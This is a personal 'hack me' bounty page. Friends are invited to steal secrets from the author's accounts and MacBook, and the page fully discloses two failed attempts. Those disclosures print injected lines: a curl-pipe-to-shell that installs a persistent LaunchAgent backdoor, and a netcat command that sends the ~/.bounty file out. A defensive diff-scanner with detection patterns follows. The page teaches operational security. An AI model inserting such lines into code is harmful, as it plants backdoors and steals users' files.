Please hack me.

I encourage you to gain unauthorized access to my computer or accounts.
If you do, I'm offering a treasure hunt prize in bitcoin.

Inspired by an initial idea by my friend @dionyziz.

Bounties

Try to steal these:

The e-mail with the subject Bounty Secret #1 from my Gmail.
฿ 0.02
The Facebook note called Bounty Secret #1 from my Facebook.
฿ 0.02
The direct message from me to myself on my Twitter.
฿ 0.02
The secret file ~/.bounty from my personal MacBook.
฿ 0.04

No physical violence!

Beating me up or threatening with physical violence is not fair game. Blackmailing or physically stealing my laptop or computer from my hands while I'm using it is also not allowed.

No break-ins!

I have not secured my home against physical break-ins.
Don't break into my house for these bounties. It's okay if I let you in.

My phone and laptop computer are logged in to Facebook, Twitter, and Gmail. If you manage to find them unlocked, you'll be able to retrieve these.

The point of the game is to educate people on security. If you find a vulnerability, but are unable to fully exploit it, please let me know. You may be able to receive a partial bounty without retrieving the hidden treasures.

Motivation

As an aspiring security professional, I am required to maintain a certain level of paranoia and best operational security practices when it comes to my accounts and systems. In order to have a rigorous threat model, my security must be associated with a monetary value. Putting a bounty on it gives me a certain amount of confidence that my security has a certain financial lower bound.

Why I need this

I work on cryptography and other security tools which require a high level of security. Access to my computers or accounts could negatively affect the people using my tools.

I am also associated with the bitcoin and infosec community and I work on open source projects all the time. Access to my computers or accounts by malicious parties could negatively affect my open source projects. People rely on my GPG signatures and my commit access to make sure they are secure. If my signatures are to be treated as trustworthy, I need to have some confidence that my systems are secure.

Hall of fame

Apostolos (aka @0xCoto) March 12th, 2017

Outcome

Attack failed.

Full disclosure

Recently, my friend @xdavidhu and I released a new infosec tool called KickThemOut, written in python, which basically ARP-Spoofs people off a network (for bandwidth, joy or anything else). Coto claimed that he had installed KickThemOut on his machine but explained that he got an error with urllib2 when attempting to run it. I found it a little strange considering that there hadn't been any issues about the library on the git repo (except for one which had to do with the person's python config and was resolved). That week, I had no time to look into the issue and since it was only affecting one person, I neglected it.

Sometime later, Coto sent me a message declaring that he'd found the bug causing the error. Subsequently, he told me that he'd forked KickThemOut and made some fixes which resolved the issue. He then asked me if I could test it to see whether it runs smoothly on my own machine. That's when I started thinking that there was something suspicious going on. I decided that I should clone the forked repo and inspect it for malicious contents.

After running a diff command to compare my python code with Coto's code, I noticed something very suspicious.
He had injected the following line of code into the main .py file:

os.system('curl [LINK] | sh')

The URL redirected to a file which contained the code:

echo downloading com.zerowidth.launched.appleupdate.plist...
mkdir -p ~/Library/LaunchAgents
curl -o ~/Library/LaunchAgents/com.zerowidth.launched.appleupdate.plist http://launched.zerowidth.com/plists/a0cccd80-e8eb-0134-c60f-0bdaa36c6e38.xml
echo installing com.zerowidth.launched.appleupdate.plist...
launchctl load -w ~/Library/LaunchAgents/com.zerowidth.launched.appleupdate.plist

In brief, if I had chosen to run the python file, a curl command would have transferred the malicious file containing the preceding lines of code onto my MacBook Pro and run them in the form of a bash script. The script would have injected a new plist file, giving Coto full access to my machine every time I turned it on (on startup), using the RunAtLoad plist command.

Security correction

I should be very careful and diligent about running untrusted software. When I do decide to run untrusted code, I should do so in a virtual machine (VM). If it's impossible to run within a VM, I should not run it at all. Additionally, I could have also asked to use Google Hangouts for screensharing, or insisted on installing Teamviewer.

When it comes to policy, I will be more insistent and less polite, regardless of what my friends tell me, and I will not break policy for convenience reasons.

David (aka @xdavidhu) August 14th, 2017

Outcome

Attack failed.

Full disclosure

While David and I were fixing some bugs in KickThemOut, David claimed that he added a new feature and that he wanted me to test it out. He asked me to try running his new develop branch commit. Subsequently, I git pulled and ran the tool as instructed.

Huge mistake.

David had injected the following line of code into the main .py file:

os.system("cat /Users/k4m4/.bounty | nc [DAVID'S_SERVER_IP] 5463")

Basically, this line of python code sends the contents of the bounty file at the path /Users/k4m4/.bounty to David's server. David had a netcat listener running on his server, awaiting any incoming connections on port 5463.

Luckily, David assumed that my main username is k4m4; however, it isn't. As a result, once I ran the script using sudo python kickthemout.py, all I got was an error message that looked something like this:

cat: /Users/k4m4/.bounty: No such file or directory

Since KickThemOut requires root to run, if David had used the correct path, he would have successfully received all contents of my bounty file.

Security correction

I should always look at the changes that have been made in each commit before pulling and running any piece of code from GitHub or anywhere else. Even if you skim through the code, a short command, such as the one that David injected, can easily go unnoticed.
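A check in the spirit of both corrections above, added here as an example and not part of this page or of KickThemOut: a small Python scanner that reads a unified diff and flags added lines that shell out, pipe a download into a shell, invoke netcat, or install a LaunchAgent. The sample diff is constructed for the example, reusing the two injected lines quoted above beside one harmless change; the pattern list is an assumption and should be extended for real use.

```python
import re

# Patterns a reviewer would want flagged in a pulled diff before running it.
# Constructed for this example; extend for the code base being reviewed.
SUSPICIOUS = [
    ("shell-out", re.compile(r"\bos\.system\(|\bsubprocess\.(call|run|Popen)\(")),
    ("pipe-to-shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("netcat", re.compile(r"\bnc\b|\bnetcat\b")),
    ("launch-agent", re.compile(r"LaunchAgents|launchctl\s+load")),
]


def scan_diff(diff_text):
    """Return [(file, added_line, [labels])] for added lines matching a pattern.

    Only '+' lines are examined (removed lines and context are ignored),
    so the result is exactly what reviewing 'git diff' would have surfaced.
    """
    findings = []
    current_file = None
    for line in diff_text.splitlines():
        if line.startswith("+++ "):
            current_file = line[4:].strip()   # path of the new file version
            continue
        if not line.startswith("+"):
            continue
        added = line[1:]
        labels = [name for name, rx in SUSPICIOUS if rx.search(added)]
        if labels:
            findings.append((current_file, added.strip(), labels))
    return findings


# Constructed sample diff: the two injected lines from the disclosures above
# plus one benign change, as a fork's 'git diff' might have shown them.
SAMPLE_DIFF = """\
--- a/kickthemout.py
+++ b/kickthemout.py
@@ -10,3 +10,5 @@
 import os
+os.system('curl [LINK] | sh')
+os.system("cat /Users/k4m4/.bounty | nc [DAVID'S_SERVER_IP] 5463")
+VERSION = "1.0.1"
 def main():
"""

if __name__ == "__main__":
    for path, text, labels in scan_diff(SAMPLE_DIFF):
        print(f"{path}: {', '.join(labels)}: {text}")
```

Running it against the sample prints the two injected lines with their labels and stays silent on the VERSION change; in practice feed it the output of git diff for the range you are about to run.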

  1. One pay-out per day.
  2. One pay-out per vulnerability.
  3. Full disclosure required.
  4. No leaving known attack vectors behind after the attack.

Also don't violate my privacy, steal my bitcoins or make GPG signatures in my name. Follow common sense.

Why this makes me more secure

Typical theoretical treatments of operational security remain problematically unpragmatic even when performed by experienced professionals. As you will see in the list of successful past attacks, even though I am somewhat aware of my security, often the cheapest and easiest ways of attacking are unexpected and I tend to be worrying about more advanced problems when I am vulnerable to the simplest possible attacks.

By encouraging white-hat friends and colleagues to attack me and disclose their methods, I am protecting myself against malicious attackers who could attempt targeted concealed and persistent attacks. White-hats and black-hats use similar methodologies. If the bounty is collected, I improve my defences and certain methods are no longer applicable.

My policies

I do not base my security on obscurity. Therefore, I am disclosing my basic policies here so that I can help potential adversaries who are treasure hunting. While I try not to, I may deviate from these policies under social engineering pressure, so even though I may think I am secure, it may be worth a shot. Some of my policies are outlined in the Hall of Fame above.

Other friends with bounties

Several friends are also following this bounty game, as they also feel it helps them improve their opsec practices. Their bounties are listed below. Their rules of engagement are similar to those above. If you have a bounty on your machine, let me know and I will add you to this list.

Dionysis Zindros

Target

Steal the ~/.bounty file on his Macbook Pro.

Payout

฿ 0.08

Target

Post the message "Bounty claimed by @YourName" on his Facebook.

Payout

฿ 0.04

Target

Post the message "Bounty claimed by @YourName" on his Twitter.

Payout

฿ 0.04

George Filippas

Target

Steal the ~/.bounty file on his linux laptop.

Payout

10 EUR

Target

Access his Facebook.
Access his Gmail.

Payout

5 EUR

Petros Angelatos

Target

Steal the ~/.bounty file on his linux laptop.

Payout

฿ 0.5

Dimitris Karakostas

Target

Steal the ~/.bounty file on his linux laptop.

Payout

50 EUR

Dimitris Lamprinos

Target

Steal the ~/.bounty file on his Linux laptop.

Payout

5 EUR

George Kastrinis

Target

Steal the ~/.bounty file on his Linux laptop.
Steal the E:\bounty file on his Windows 10 desktop.
Steal the email with subject "Bounty secret" from his gmail.
Access his Facebook.
Access his Gmail.

Payout

5 EUR